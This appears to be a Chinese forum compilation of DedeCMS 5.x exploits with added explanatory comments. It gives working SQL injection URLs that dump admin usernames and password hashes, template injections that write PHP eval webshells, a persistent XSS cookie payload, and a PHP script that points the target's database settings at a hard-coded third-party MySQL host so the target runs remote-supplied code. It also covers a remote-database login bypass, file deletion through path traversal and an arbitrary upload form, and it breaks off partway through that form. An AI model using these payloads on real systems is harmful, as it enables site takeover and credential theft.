|
Dedecms 5.6 rss注入漏洞(plus/rss.php,基于报错回显的 updatexml 注入)
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
说明:payload 借 _Cs 数组参数补齐括号后接上 AND … #,再用 updatexml() 把 dede_admin 的 uname 与 pwd 以报错形式回显;MID(pwd,4,16) 取的是 dede 20 位密码串中的 16 位 MD5(见本文末尾关于密码格式的说明),0x5b/0x5d 即 [ ],用于在错误信息中定位结果。
9 e# |5 y( h9 s1 S d0 {# M
% G; \) H% O% X, _. a- c! P- ~6 j) d4 g4 \; r1 Y" J$ A
7 B; b, t- \: F; O* v/ @
* {5 W' |4 Y% _, Y F, u
0 o+ m r1 e p& ^" s% v" y, v2 O( i& W7 w4 c g
1 J. x" ^1 \, B3 s
DedeCms v5.6 嵌入恶意代码执行漏洞(会员发布软件时"本地地址"字段可注入模板标签)
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
发表后查看或修改即可执行。
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
说明:两段 base64 分别解码为 x.php 和 <?php eval($_POST[xiao])?>baidu,即在当前目录生成 x.php,一句话密码为 xiao。eC5waHA、w 等未加引号,在 PHP 8 之前作为未定义常量按字符串处理,只产生 notice 不中断执行。
# _' @( i0 l1 ~: Z. D1 }5 Q
3 p8 g( `9 h+ N* Y
, L9 K. [( b5 R5 }& F" h w6 }
/ ~/ }# L$ V& M2 @! d# Y; U" K" p2 j r/ Y4 L; }) o# w, u3 g8 h
' l/ \$ N# V# x. r3 N; X6 A3 a. ~5 K
) q* r: `: ?% S, u* x; p
0 a7 p4 M* ^$ c) E1 g
Dede 5.6 GBK SQL注入漏洞(member/index.php 的 uid 参数,宽字节注入)
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
说明:%E6%B6%9B…%E6%97%A7 是"涛声依旧"的 UTF-8 字节序列;发到按 GBK 处理的站点时,末尾的 0xA7 原理上会与转义引号时加上的反斜杠(0x5C)拼成一个 GBK 双字节字符,使后面的单引号逃逸出字符串。后两条 URL 看起来只用于观察是否出现 SQL 报错。
9 _8 C3 X6 s A" D. ?7 Y( X" F7 r" h; i
$ Y; @8 P# n! r4 J2 O2 _) H" L
3 L9 U: p& J% t: N
9 p* `3 e8 y7 g- }7 s
/ {& S I; |: P: O" q I
9 j9 y6 L5 C7 N7 Y" J B: [. v; ^" j/ e9 O/ ?
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
说明:sql 参数被直接当作查询语句执行;`#@__` 是 dede 的表前缀占位符(默认展开为 dede_),该语句即 SELECT * FROM dede_admin,可直接读出管理员账号与密码串。
* J6 Z: e/ a6 S, a4 Q2 H! b5 w
' l2 U" }: w0 M8 W) Z& W, X7 C5 K/ I4 c* X( D
, P7 ~- |! k" K6 W+ O7 G5 ^
0 f) j! a7 u! _& l; U
DEDECMS 全版本 gotopage变量XSS漏洞(dede/login.php 的 gotopage 参数)
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
说明:URL 中 String.fromCharCode(...) 解码后的脚本会把 '"><script>alert(/xss rootkit!/)</script><x=" 写入名为 gotopage、有效期 365 天的 cookie(document.cookie='gotopage='+…+';expires='+…),据下文描述 login.php 之后会再从 cookie 中取到 gotopage,因此无需 URL 参数也会再次触发,这就是所谓"持久化"。
3 D, Z, f# D0 g4 H- l2 Bhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="& \: b4 Y$ _4 q+ P
, X5 ^/ u# D# B0 U% |, j' P5 t" Y& K# o5 R; _$ p
2.关闭浏览器,之后无论访问下面哪个URL,都会再次触发我们的XSS(payload 已存于 cookie,不再依赖 URL 参数)。
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
6 ^" w3 @' r& ^ d
5 C8 b4 q- W4 ^2 Y
http://v57.demo.dedecms.com/dede/login.php
8 g m5 C! E# r) F2 c$ c/ I5 N8 U9 T7 }+ K. j/ `. e8 Q9 r
5 q% e5 g1 p" y3 H
DeDeCMS(织梦)变量覆盖 getshell(plus/mytag_js.php,通过 _COOKIE[GLOBALS][cfg_db*] 参数覆盖数据库连接配置)
说明:下面脚本把目标站的 cfg_dbhost/cfg_dbuser/cfg_dbpwd/cfg_dbname 覆盖为脚本中写死的远程 MySQL(184.105.174.114,exploit/90sec),mytag_js.php 随后从该库的 dede_mytag 表读取并执行 aid 对应的标签内容。该远程库不受使用者控制,其内容决定了目标上实际执行的代码;脚本只根据响应首行含有 "OK"(即 HTTP 200 OK)判定"成功",并不能证明 fuck.php 已写入。
" i [( [ D4 H) p$ X( e3 L#!usr/bin/php -w( \8 f* N0 t; E
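<?php
// DedeCMS "variable coverage" (GLOBALS override) exploit driver for plus/mytag_js.php.
// Usage: php <script> <host> <aid> <path>
//   host - target host name without scheme (used as the TCP target, the Host: header and
//          inside the doaction URL)
//   aid  - dede_mytag row id to render: 1, 2 or 3 (the usage text below lists where each
//          one is expected to write its file)
//   path - DedeCMS install directory under the web root (e.g. "old"); empty for a root install
// SECURITY NOTE(review): Getshell() points the target's database connection at a hard-coded
// third-party MySQL host. Whatever that host's dede_mytag table holds is what the target
// executes; the person running this script does not control it.
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.comwww.webvul.com
');
echo "\r\n";
// Explicit check instead of the loose "$argv[2]==null": bail out when aid is absent or empty.
if (!isset($argv[2]) || $argv[2] === '') {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url = $argv[1];
$aid = $argv[2];
// The original read $argv[3] unconditionally and relied on error_reporting(E_ERROR) to hide
// the undefined-index notice; make the "no path given" case explicit (same effective value).
$path = isset($argv[3]) ? $argv[3] : '';
$exp = Getshell($url, $aid, $path);
// Getshell() returns only the first line of the HTTP response. In "HTTP/1.1 200 OK" the
// substring "OK" starts at offset 13, so this condition really means "got an HTTP 200",
// not "the file was written"; verify the printed Shell: URL by hand.
if (strpos($exp, "OK") > 12) {
    echo "\nExploit Success \n";
    if ($aid == 1) echo "\nShell:".$url."/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "\nShell:".$url."/$path/fuck.php\n";
    if ($aid == 3) echo "\nShell:".$url."/$path/plus/fuck.php\n";
} else {
    echo "\nExploit Failed \n";
}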
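/**
 * Send the GLOBALS-override POST to /<path>/plus/mytag_js.php on $url and return the first
 * line of the HTTP response (normally the status line, e.g. "HTTP/1.1 200 OK").
 *
 * @param string $url  target host name; used as-is for the TCP connect and the Host: header
 * @param string $aid  dede_mytag row id, appended as ?aid= to the request path
 * @param string $path DedeCMS install directory under the web root ('' for a root install)
 * @return string      first response line, or '' when the connection could not be opened
 *
 * The body overrides cfg_dbhost/cfg_dbuser/cfg_dbpwd/cfg_dbname/cfg_dbprefix through
 * _COOKIE[GLOBALS][...] so that mytag_js.php loads its tag body from a remote MySQL server
 * instead of the site's own database. Host, account and database name are hard-coded to a
 * third party's server, so the tag it serves (the code the target runs) is outside this
 * script's control. Note that the doaction URL always names aid=1 while the request path
 * carries $aid; QuickSearchBtn=%CC%E1%BD%BB is the GBK encoding of the submit button text.
 */
function Getshell($url,$aid,$path){
    $id   = $aid;
    $host = $url;
    $port = "80";   // plain HTTP only
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data  = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";   // left off so the reply is not compressed
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";

    // Bounded connect timeout; the original used the php.ini default and could hang for a minute.
    $ock = @fsockopen($host, $port, $errno, $errstr, 10);
    if (!$ock) {
        echo "\nNo response from ".$host."\n";
        return '';   // the original fell through and called fwrite() on false
    }
    fwrite($ock, $data);
    // Read a single line only, as the original did (it returned from inside its loop on the
    // first fgets()); the caller searches this line for "OK".
    $exp = '';
    if (!feof($ock)) {
        $exp = fgets($ock, 1024);
    }
    fclose($ock);   // the original never closed the socket
    return $exp;
}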
, Q" v3 _- a' _1 w) x6 a8 F' @
- S6 P3 w9 P: G+ G$ y5 \8 Z
?>
9 E ~5 A/ _; u3 b8 L: I% g, W3 W: ^" D7 z' z, o( k& g
( D8 a6 u" o& c& A% l
4 ^' m' v2 A' M; s
c$ M, q; P* [. S
5 i) C' u. z. g7 o
- q) ?% z' G* o- J. M/ b* e1 c6 T
! b' i4 `& E1 V- n" ~/ T1 W/ c4 k G5 \5 [; I# k1 U: s7 q
7 U4 O3 n2 p0 Z
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台,login.php 的 _POST[GLOBALS][cfg_db*] 变量覆盖)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

把上面 validate=dcug 改为当前的验证码,即可直接进入网站后台。
说明:原理与前面 mytag_js.php 的变量覆盖相同,用 _POST[GLOBALS][cfg_db*] 把登录校验所用的数据库指向 URL 中给出的远程 MySQL(116.255.183.90,root/r0t0),该库中应存在与 userid/pwd 匹配的管理员记录。这个远程库同样由第三方控制,使用前应换成自己搭建的库。
( `' {5 t, s3 h
- F; k; ^4 _' y" z
此漏洞的前提是必须得到后台路径(login.php 所在目录,默认为 dede/,常被改名)才能实现。
! I& U7 m0 ]* t2 T
6 k# M+ t$ r: c& c" V
: \+ I1 P/ v4 C$ I1 `! G- g& j1 [& i
% J& j' V' h% D% g8 F
1 r' F. ^& w7 T3 v* M0 X
a- v3 p1 f& |) y& @3 z) X, v* _4 P# a$ c! F! l8 m" o
4 M8 Q- m+ u( ?3 o3 H/ Y/ z2 x4 @' o$ n+ W# H1 t* n* [3 F/ m
Dedecms织梦 标签远程文件写入漏洞(plus/mytag_js.php 变量覆盖)
前提条件:必须准备好自己的 dede 数据库,然后插入数据:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
说明:normbody 中的 {dede:php} 标签会在目标站上作为 PHP 执行;示例里 fwrite 的内容被留空(原帖有意省略),需自行填入要写进 1.php 的代码;echo "OK" 用于在响应中判断标签是否已执行。原帖中的引号被论坛重复转义为 '',此处已还原。
! f) i& C9 E2 Z
) J4 A: G3 P, b' }8 U' H3 [0 a
再用下面的表单提交,shell 就在 mytag_js.php 所在目录下的 1.php(fopen 用的是相对路径)。原理自己研究。。。
<!-- Hand-built request for the plus/mytag_js.php GLOBALS-override bug.
     The _COOKIE[GLOBALS][cfg_*] fields are posted as ordinary form parameters; on a
     vulnerable install they overwrite the database connection settings, so mytag_js.php
     loads the aid=1 row of dede_mytag from the database named here (the one prepared
     with the INSERT above) rather than from the victim's own database.
     NOTE(review): addaction() below is never attached to any event (no onsubmit/onclick),
     so as pasted the form submits to action="" (the page it sits on) instead of the URL in
     the "doaction" box; presumably the hook was lost when the snippet was posted. -->
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<!-- doaction: the victim's mytag_js.php URL that addaction() copies into form.action -->
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<!-- connection parameters of the attacker-prepared MySQL server, one per cfg_ variable -->
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<!-- table prefix; must match the table the INSERT above targets (dede_mytag) -->
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<!-- nocache=true: presumably asks mytag_js.php to render the tag fresh rather than serve a cached copy; not shown on this page -->
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
// Point the form at whatever URL was typed into "doaction". Not wired to any event here.
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
0 e; [1 B# n0 n! Z5 _' q; z c! ^3 M1 B o0 K8 p8 R
6 O0 N y/ }" X; H
7 e Z) n: E3 E
k/ V5 v7 _( ?+ N
, B* a/ p& _: Y F% P, c4 G
6 r4 m! O- e/ @$ ^7 ~, n/ O* I+ ]/ r+ F3 d2 f
2 }# I, c+ I* V5 P" f
DedeCms v5.6 嵌入恶意代码执行漏洞(与前文同一漏洞,此处为重复)
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成 x.php,一句话密码为 xiao(第二段 base64 解码后即 <?php eval($_POST[xiao])?>)。
Dedecms <= V5.6 Final 模板执行漏洞(member/article_edit.php 可把文章的 templet 指向会员上传的文件)
1 注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
uploads/userup/2/12OMX04-15A.jpg
4 `6 n9 i6 N( k% j
模板内容是(如果限制图片格式,在文件开头加 gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
说明:runphp='yes' 使标签体作为 PHP 执行;'<'.'?php' 的拼接应是为了避免模板文件本身被当作 PHP 开始标记处理。写出的 1.php 是一句话木马,密码为 cmd。
2 修改刚刚发表的文章,查看源文件,构造一个表单(aid、idhash、sortrank 等隐藏字段需从真实编辑页源码中取得,vdcode 填当前验证码):
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<!-- Body of the member article_edit.php form (the opening <form> tag is on the line above).
     Everything is the stock edit form as captured from the browser, except the two
     "templet" / "dede_addonfields" inputs marked below, which are what turns a normal
     article edit into a template swap. -->
<!-- per-article values copied from the real edit page; idhash presumably ties the request to aid -->
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />


<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>


<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>


<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)


<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>


<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)


<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>


<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)


<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>


<!-- THE INJECTED PART: "templet" is not on the stock form. Its value points the article's
     template at the "image" uploaded in step 1, relative to the templates directory.
     NOTE(review): the space in "../ uploads" looks like a paste artifact; the other example
     on this page uses "../uploads/userup/3/1.gif" without it. -->
<input type='text' name='templet'
value="../ uploads/userup/2/12OMX04-15A.jpg">
<!-- dede_addonfields lists extra field names the save handler should accept; naming
     "templet" here is presumably what makes article_edit.php persist the value above
     (the page says the save then reports success and the template path is changed). -->
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(这里构造)
</div>

<!-- 表单操作区域 -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<!-- NOTE(review): the double quotes inside this value attribute are unescaped (the original
     &quot; entities were most likely lost when the snippet was posted); the body also
     carries a stray "<?phpinfo()?>" that is not needed for the template swap. -->
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>


<!-- vdcode must carry the current CAPTCHA value for the save to be accepted -->
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<!-- NOTE(review): the space in "127.0.0.1 /dede" is another paste artifact -->
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />


<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>
; m2 D* d" C% s$ i; A) j5 s( X [, @* a
1 q4 S3 [! ^. H# ]
提交,提示修改成功,则我们已经成功修改模板路径。
3 访问修改的文章:
假设刚刚修改的文章的 aid 为 2,则我们只需要访问:
http://127.0.0.1/dede/plus/view.php?aid=2
即可在 plus 目录下生成 webshell:1.php(模板里的 fopen("1.php") 是相对路径,相对于执行它的 view.php 所在目录)。
( ~2 ~4 Y( n& x! C* |) F* G
1 d/ |/ Z# ]+ U
, F8 u' k1 o' C5 d5 c) a2 ]9 N( h$ w7 m( y# S7 K+ o
0 @5 ~ L. H. q7 [; X8 `
& w0 h+ `" @2 y4 _1 ]2 h0 {2 J2 f$ i" Z% t: M/ }8 {; G
3 b3 }3 t; U* A: H v% L- Y3 F" K) u
0 R6 T6 r) W" r2 y+ r0 F5 U' a2 k$ u* G
q0 l( M' D3 n3 V& q+ M2 m0 I
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)(思路与上一节相同:上传带模板标签的"图片",再把文章的 templet 指向它)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
保存为 1.gif(开头的 Gif89a 用于通过图片格式检查)。
2 g- U% p$ u7 A& n4 R/ r2 [<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 3 M i/ x8 O# ]% ]3 j$ U8 V+ O6 u
<input type="hidden" name="aid" value="7" /> 9 u+ X. W0 Z; A' o8 O5 u. Q: Y
<input type="hidden" name="mediatype" value="1" />
! T0 }- G3 c$ R<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
* G1 }& I) ?& _<input type="hidden" name="dopost" value="save" /> 9 g+ W- L) ?; ?0 i3 s
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
2 H2 b. i+ \0 ]: I<input name="addonfile" type="file" id="addonfile"/>
0 g: N. N0 Q+ r) d3 K<button class="button2" type="submit" >更改</button> # O+ e5 g( s+ S
</form> 6 Y8 H. ?9 l- l1 _: f" c
, v9 E7 S; ~% g- Y
构造如上表单,上传后图片保存为 /uploads/userup/3/1.gif(从表单看,oldurl 指向的既有附件被上传文件替换)。
发表文章,然后构造修改表单如下(aid、idhash、sortrank 取自真实编辑页源码):
. Q, h* l0 {% e. o& d% t0 | L- ?( H2 a
G' {0 u% S" _& c6 W2 o0 W
<!-- Step 2: re-save the article with its template pointed at the uploaded 1.gif.
     Same technique as the 12OMX04-15A.jpg example earlier on this page, trimmed to the
     fields that matter. Per-article values (aid, idhash, sortrank) come from the real edit page. -->
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<!-- NOTE(review): this first <select> is never closed in the paste; the second one starts inside it -->
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<!-- THE INJECTED PART: declare "templet" as an extra field and point it at the crafted upload -->
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<!-- NOTE(review): unlike the earlier example, no vdcode (CAPTCHA) field is included here;
     whether the 5.6 GBK build requires one on edit is not shown on this page -->
<button class="button2" type="submit">提交</button>
</form>
4 n7 C0 j5 t! V! L$ w x( |6 o$ g9 g! m* w' G# X# I
) B; Y/ C- B6 W( j9 G- n
( h) S; @& z) {" j- u' \; C* a9 n$ k. o& o r& K8 M9 h- G) u
( v2 E( H: W1 A/ b& N) l; p+ l4 u1 ?! v1 i. c. ]0 G& U1 E
+ P/ p% W4 D1 R) k% Y! @7 x2 r
1 ?) ]7 c4 p6 G0 q d+ @
. N% C: c$ e- V" w* I4 C3 Q0 `( K2 W
' Y) m9 Q* n2 j- H v) J3 s7 B1 G$ |# s. `$ G, X
织梦(Dedecms)V5.6 远程文件删除漏洞(member/edit_face.php,oldface 参数目录穿越)
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
说明:oldface 看来未做路径规范化,../ 可跳出 uploads/userup 目录,删除 web 进程有写权限的任意文件;示例删除的是会员中心的 logo 图片。测试时请选用无关紧要的文件。
- j. ]3 c& M5 m) ?! { o2 c
7 ~. L6 W5 k$ m& _2 d
( w# E4 l, o c& m+ a0 e
5 R6 l% X5 l9 T$ j4 ^% v
9 _7 f9 @: U( ]' ]/ r& n; G
7 e) l8 }9 g6 @0 [+ _ Q* ^- u ]8 Q. [, W; }( t ?
2 E- N* n) C5 ~3 F2 b' r0 u; l5 W5 a
8 C8 N4 a7 e2 ]7 q2 G4 t' J$ Z$ z, r- R
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
http://www.test.com/plus/carbuya ... urn&code=../../
说明:原帖 URL 被论坛截断("..."处),只能看出 code 参数被用于拼接包含路径且可用 ../ 穿越,完整参数请参考原始公告。
! Z, o/ Q! x/ z/ R, d4 Q. ^2 C7 ~
/ f J# b. I R& C
) I/ B ?# g4 m7 z& v; {, j1 T8 ]
- T: s" A9 j( h% H X' g; E& k# p7 V6 S8 @. E$ i
% m! ~5 h5 R" C2 l% g6 z" H
% E3 M6 E6 h$ ~+ h
0 d# Q# F* B( a b. c$ g$ j9 U+ f% L4 A# H, B
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞(同前)
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
说明:dede_admin.pwd 存的不是完整 MD5:把 32 位 MD5 去掉前 5 位、去掉后 7 位得到 20 位串;再把这 20 位串去掉前 3 位、去掉后 1 位,即得到 16 位 MD5(与前文 rss 注入中 MID(pwd,4,16) 的取法一致),可直接拿去查表破解。
9 }$ z; Y3 p0 g7 D
$ o4 B% @# f1 k" }1 ] N
& J+ ]& y( T" L+ l5 f
: ~3 w4 N5 } [7 |, C. P- T
1 G2 H: c- v: x- @2 g% |( r6 d }
% x C. g* N7 Z1 \) [, v2 \6 A: e7 y! o' ^ g
( t! v; O! R2 S% z
I' p# q1 C) H# P4 {+ @4 r: c+ f3 d) a; F2 q4 \& x
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞(arcurl 参数,union 注入)
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
说明:从语句结构看 payload 分两层:外层 union 让 arcurl 查询返回一段带引号的字符串,该字符串再进入随后对 dede_feedback 的查询;内层 union 把 dede_admin 的 userid、pwd 填到 feedback 各列的位置上,随评论内容输出。
- z% i. u) N0 L: t
" r j4 j* ^; P( F+ Z& C6 l) _. R) d
, i. F3 S* Q1 B3 C
. J# G" U* o/ j) t$ m9 Z w/ v
8 W. c9 U c, Y( u3 D% B4 j$ \- M% c* O. f) x! c. |: Q, e
3 i7 f0 U2 J# C7 ]7 r' Y
) o/ \: g3 j4 ^
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞(include/dialog/select_soft_post.php;需 register_globals=On,通过 POST 覆盖未初始化的 cfg_basedir、cfg_imgtype 等配置变量,把允许的上传类型改成 php,实现任意文件上传)
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<!-- Upload form for include/dialog/select_soft_post.php. With register_globals on, every
     hidden cfg_* field below becomes a global that the script never initialised itself,
     so the whitelist of allowed extensions and the base directory come from the attacker. -->
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<!-- activepath + cfg_basedir: where the file is written; '../../' climbs from the dialog directory back to the web root -->
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<!-- the three type lists are set to 'php' so a .php upload passes the extension checks -->
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<!-- f / job: stock parameters of the upload dialog (target form field, requested action) -->
